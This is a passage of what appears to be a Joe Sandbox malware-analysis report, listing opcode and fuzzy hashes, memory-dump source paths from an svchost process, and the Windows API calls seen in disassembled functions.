                                                        • Instruction ID: dc1ac7ef7cd5220de1efaa23918da90dfe07c950faa1f83c25e2fd2283a28f24
                                                        • Opcode Fuzzy Hash: 0036035fc280b7a5a111a049c7edfc77b7be6b9ab52e14187ebc45e366edaa55
                                                        • Instruction Fuzzy Hash: 9831CB32A09660A6E713DF21E845B997BF4F342BDCF058116EE5E03788DB38E949CB04
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 0000002E.00000002.3134958889.00000179537A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000179537A0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_46_2_179537a0000_svchost.jbxd
                                                        Similarity
                                                        • API ID: FileWrite$ConsoleErrorLastOutput
                                                        • String ID:
                                                        • API String ID: 2718003287-0
                                                        • Opcode ID: 3a35214534a53fd0655822596b90f4932f5655332a96a267e8fac8abb8670521
                                                        • Instruction ID: 06d4593c12757a61a920345c0e2df76c0e129f7e16386725fafdea6654bba7a9
                                                        • Opcode Fuzzy Hash: 3a35214534a53fd0655822596b90f4932f5655332a96a267e8fac8abb8670521
                                                        • Instruction Fuzzy Hash: C5D1BF32B19A9489E712CFA9D4503DC3BB1F35AB9CF148216DE5E97B99EB34C50AC340
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 0000002E.00000002.3134958889.00000179537A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000179537A0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_46_2_179537a0000_svchost.jbxd
                                                        Similarity
                                                        • API ID: Heap$Process$Free
                                                        • String ID:
                                                        • API String ID: 3168794593-0
                                                        • Opcode ID: ccd79a5c24cc2b6b77d5d0d776de3086a7ca9ca8278a44c8c605b81f59301eca
                                                        • Instruction ID: bb6b78b593707857310a3324dd096787fdb4aa97373bc89aca0eb61e411b0d18
                                                        • Opcode Fuzzy Hash: ccd79a5c24cc2b6b77d5d0d776de3086a7ca9ca8278a44c8c605b81f59301eca
                                                        • Instruction Fuzzy Hash: 1D118B36918AA8C6E716DF66A81818977B0F78AF89F084026EBCD43716EE38C458C744
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 0000002E.00000002.3134958889.00000179537A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000179537A0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_46_2_179537a0000_svchost.jbxd
                                                        Similarity
                                                        • API ID: ConsoleErrorLastMode
                                                        • String ID:
                                                        • API String ID: 953036326-0
                                                        • Opcode ID: fa691138abb93940963a85324df6708f2ee223ec670a65e1a7af20f8b77031a4
                                                        • Instruction ID: aa35c425ef9fc4d6b2506b4269cbb304a299e5433bf6d60ac2d50f473d078f8f
                                                        • Opcode Fuzzy Hash: fa691138abb93940963a85324df6708f2ee223ec670a65e1a7af20f8b77031a4
                                                        • Instruction Fuzzy Hash: D191A032F1966485FB629F6594A03EE2BB0B746B8CF14410BDE4E67B95EF35C48AC700
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 0000002E.00000002.3134958889.00000179537A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000179537A0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_46_2_179537a0000_svchost.jbxd
                                                        Similarity